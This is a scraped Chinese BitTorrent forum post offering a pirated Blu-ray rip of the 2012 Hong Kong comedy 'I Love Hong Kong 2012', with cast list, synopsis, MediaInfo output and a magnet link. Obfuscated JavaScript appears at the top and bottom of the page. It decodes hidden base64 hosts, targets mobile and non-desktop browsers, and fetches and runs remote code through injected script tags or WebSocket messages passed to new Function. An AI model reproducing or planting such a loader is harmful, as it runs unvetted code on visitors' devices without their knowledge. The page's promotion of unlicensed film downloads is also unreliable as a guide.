2012喜上加喜[国粤语配音/中文字幕].I.Love.Hong.Kong.2012.1080p.BluRay.x265.10bit.DTS.2Audio 6.60GB

版主小s 28天前 218

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 2012喜上加喜 / 我爱香港2 / 我爱香港救地球

◎片 名 2012我愛HK 喜上加囍

◎年 代 2012

◎产 地 中国香港 / 中国大陆

◎类 别 剧情 / 喜剧

◎语 言 粤语 / 汉语普通话

◎上映日期 2012-06-15(中国大陆) / 2012-01-20(中国香港)

◎IMDb链接 https://www.imdb.com/title/tt2317379/

◎豆瓣评分 6.1/10 (14004人评价)

◎豆瓣链接 https://movie.douban.com/subject/7161707/

◎片 长 96分钟

◎导 演 钟澍佳 Chung Shu Kai (id:1313626)

钱国伟 Wilson Chin (id:1320972)

曾志伟 Eric Tsang (id:1002862)

◎编 剧 戚家基 Peter Tsi (id:1328458)

郭建乐 Kin-Lok Kwok (id:1328460)

徐敏琳 Michelle Tsui (id:1398193)

◎演 员 曾志伟 Eric Tsang (id:1002862)

毛舜筠 Teresa Mo (id:1274338)

黄宗泽 Bosco Wong (id:1038569)

冯淬帆 Stanley Fung (id:1274503)

邵音音 Yin-Yin Shaw (id:1297367)

张馨予 Xinyu Zhang (id:1276035)

苏永康 William So Wing Hong (id:1155115)

麦长青 Cheung-Ching Mak (id:1274580)

林颖彤 Bella Lam (id:1323794)

庄思敏 Jacquelin Chong (id:1326932)

王祖蓝 Cho-lam Wong (id:1274238)

卢大伟 David Lo (id:1325802)

苏丽明 So Lai Ming (id:1348396)

邵卓尧 Cheuk-Yiu Siu (id:1358905)

高钧贤 Matthew Kwan Yin Ko (id:1314484)

金刚 Kong King (id:1317182)

麦贝夷 Karene Mak (id:1377342)

麦玲玲 Lingling Mak (id:1371988)

林夏薇 Rosina Lin (id:1326852)

陈国峰 Penny Chan (id:1387355)

余迪伟 Alton Yu (id:1357416)

阮兆祥 Louis Yuen (id:1274951)

李海生 Hoi Sang Lee (id:1274574)

苟芸慧 Christine Kuo (id:1315587)

马蹄露 Celine Ma Tai-Lau (id:1318726)

乐瞳 Cilla Kung (id:1319138)

谷峰 Feng Ku (id:1054239)

卢觅雪 Michelle Lo (id:1340144)

梁小冰 Siu-bing Leung (id:1016083)

徐伟栋 Edward Chui (id:1336685)

高海宁 Samantha Ko (id:1316094)

赵永洪 Raymond Chiu (id:1315541)

沈卓盈 Jess Shum Cheuk Ying (id:1315890)

洪智杰 Osman Hung Chi-Kit (id:1316709)

谢志华 Chi-Wah Tse (id:1417403)

邵剑秋 Kim-Chau Shiu (id:1413263)

乐易玲 Virginia Lok (id:1403148)

谢凯荣 Eric Tse Hoi Wing (id:1357597)

◎标 签 香港 / 喜剧 / TVB / 2012 / 搞笑 / 贺岁 / 温情 / 港片

◎简 介

天气预报播报员郭靖(冯淬帆 饰)即将退休,成为新闻播报员的愿望却始终没有实现,膝下三个儿女亦各有烦恼:大女郭美美(毛舜筠 饰)强悍娇蛮,其夫姚明(曾志伟 饰)憨厚老实,夫妻关系在妻强夫弱的事实下逐渐失衡;二女郭晶晶(何韵诗 饰)与下属乐易瓦(黄宗泽 饰)在玩地下恋,不思进取却受女性欢迎的男友令她没有安全感;小儿子郭富城是个宅男,他希望将自己的女神Vivian(张馨予 饰)从大富豪Roberto(苏永康 饰)手上救出。一家子正烦恼之际,2012末世谣言越传越盛,发觉真相的郭家人决定协力阻止Roberto收购电视台,平息香港市民的恐慌,郭靖也终于实现播报重要新闻的夙愿。

该片是“我爱香港”贺岁系列第三弹,即《72家租客》和《我爱香港开心万岁》的续集。

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 185598377167996489844297791569004567484 (0x8BA0F27D1FEF33C7DC552D42C8EF9BBC)

  4. Complete name : [email protected]BQDDQ.COM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 6.60 GiB

  8. Duration : 1 h 35 min

  9. Overall bit rate : 9 886 kb/s

  10. Encoded date : UTC 2021-11-03 03:00:38

  11. Writing application : mkvmerge v56.1.0 ('My Friend') 64-bit

  12. Writing library : libebml v1.4.2 + libmatroska v1.6.4


  13. Video

  14. ID : 1

  15. Format : HEVC

  16. Format/Info : High Efficiency Video Coding

  17. Format profile : Main [email protected]@Main

  18. Codec ID : V_MPEGH/ISO/HEVC

  19. Duration : 1 h 35 min

  20. Bit rate : 7 668 kb/s

  21. Width : 1 920 pixels

  22. Height : 816 pixels

  23. Display aspect ratio : 2.35:1

  24. Frame rate mode : Constant

  25. Frame rate : 24.000 FPS

  26. Color space : YUV

  27. Chroma subsampling : 4:2:0

  28. Bit depth : 10 bits

  29. Bits/(Pixel*Frame) : 0.204

  30. Stream size : 5.12 GiB (78%)

  31. Writing library : x265 3.5+2-g2b25c9ba0+45:[Windows][GCC 10.2.0][64 bit] Yuuki 10bit+8bit+12bit

  32. Encoding settings : rc=crf / crf=17.0000 / qcomp=0.70 / qpstep=4 / stats-write=0 / stats-read=0 / no-lossless / no-cu-lossless / aq-mode=3 / aq-strength=0.90 / cbqpoffs=0 / crqpoffs=0 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=0.00 / deblock=0:0 / ref=6 / limit-refs=1 / no-limit-modes / bframes=9 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=24 / max-keyint=240 / rc-lookahead=24 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=64 / min-cu-size=8 / me=3 / subme=7 / merange=48 / rdoq-level=0 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / cutree / sao / no-rect / no-amp / no-open-gop / wpp / no-pmode / no-pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541111039 / frame-threads=4 / numa-pools=+ / log-level=2 / input-csp=1 / input-res=1920x816 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / no-repeat-headers / aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=4 / early-skip / rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass

  33. Default : Yes

  34. Forced : No


  35. Audio #1

  36. ID : 2

  37. ID in the original source medium : 4352 (0x1100)

  38. Format : DTS

  39. Format/Info : Digital Theater Systems

  40. Codec ID : A_DTS

  41. Duration : 1 h 35 min

  42. Bit rate mode : Constant

  43. Bit rate : 1 509 kb/s

  44. Channel(s) : 6 channels

  45. Channel layout : C L R Ls Rs LFE

  46. Sampling rate : 48.0 kHz

  47. Frame rate : 93.750 FPS (512 SPF)

  48. Bit depth : 16 bits

  49. Compression mode : Lossy

  50. Stream size : 1.01 GiB (15%)

  51. Title : Cantonese

  52. Language : Chinese

  53. Default : Yes

  54. Forced : No

  55. Original source medium : Blu-ray


  56. Audio #2

  57. ID : 3

  58. ID in the original source medium : 4353 (0x1101)

  59. Format : AC-3

  60. Format/Info : Audio Coding 3

  61. Commercial name : Dolby Digital

  62. Codec ID : A_AC3

  63. Duration : 1 h 35 min

  64. Bit rate mode : Constant

  65. Bit rate : 640 kb/s

  66. Channel(s) : 6 channels

  67. Channel layout : L R C LFE Ls Rs

  68. Sampling rate : 48.0 kHz

  69. Frame rate : 31.250 FPS (1536 SPF)

  70. Compression mode : Lossy

  71. Stream size : 438 MiB (6%)

  72. Title : Mandarin

  73. Language : Chinese

  74. Service kind : Complete Main

  75. Default : No

  76. Forced : No

  77. Original source medium : Blu-ray


  78. Text #1

  79. ID : 4

  80. ID in the original source medium : 4609 (0x1201)

  81. Format : PGS

  82. Muxing mode : zlib

  83. Codec ID : S_HDMV/PGS

  84. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  85. Duration : 1 h 34 min

  86. Bit rate : 56.7 kb/s

  87. Count of elements : 4108

  88. Stream size : 38.3 MiB (1%)

  89. Title : chs

  90. Language : Chinese

  91. Default : Yes

  92. Forced : No

  93. Original source medium : Blu-ray


  94. Text #2

  95. ID : 5

  96. ID in the original source medium : 4608 (0x1200)

  97. Format : PGS

  98. Muxing mode : zlib

  99. Codec ID : S_HDMV/PGS

  100. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  101. Duration : 1 h 34 min

  102. Bit rate : 62.8 kb/s

  103. Count of elements : 4108

  104. Stream size : 42.4 MiB (1%)

  105. Title : cht

  106. Language : Chinese

  107. Default : No

  108. Forced : No

  109. Original source medium : Blu-ray


  110. Text #3

  111. ID : 6

  112. ID in the original source medium : 4610 (0x1202)

  113. Format : PGS

  114. Muxing mode : zlib

  115. Codec ID : S_HDMV/PGS

  116. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  117. Duration : 1 h 34 min

  118. Bit rate : 70.5 kb/s

  119. Count of elements : 4108

  120. Stream size : 47.6 MiB (1%)

  121. Title : eng

  122. Language : English

  123. Default : No

  124. Forced : No

  125. Original source medium : Blu-ray


  126. Menu

  127. 00:00:00.000 : 第 01 章

  128. 00:06:04.625 : 第 02 章

  129. 00:09:24.750 : 第 03 章

  130. 00:12:39.958 : 第 04 章

  131. 00:19:45.083 : 第 05 章

  132. 00:27:09.125 : 第 06 章

  133. 00:30:40.791 : 第 07 章

  134. 00:37:40.041 : 第 08 章

  135. 00:42:35.625 : 第 09 章

  136. 00:48:02.166 : 第 10 章

  137. 00:55:28.958 : 第 11 章

  138. 00:58:13.541 : 第 12 章

  139. 01:05:38.625 : 第 13 章

  140. 01:11:40.375 : 第 14 章

  141. 01:15:24.375 : 第 15 章

  142. 01:21:10.375 : 第 16 章

  143. 01:25:14.250 : 第 17 章

  144. 01:31:07.208 : 第 18 章




复制代码


TAGS 剧情 喜剧

磁力链:
  • magnet:?xt=urn:btih:03FB7C4E9B09EE787219AD853523B1145134FE12

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};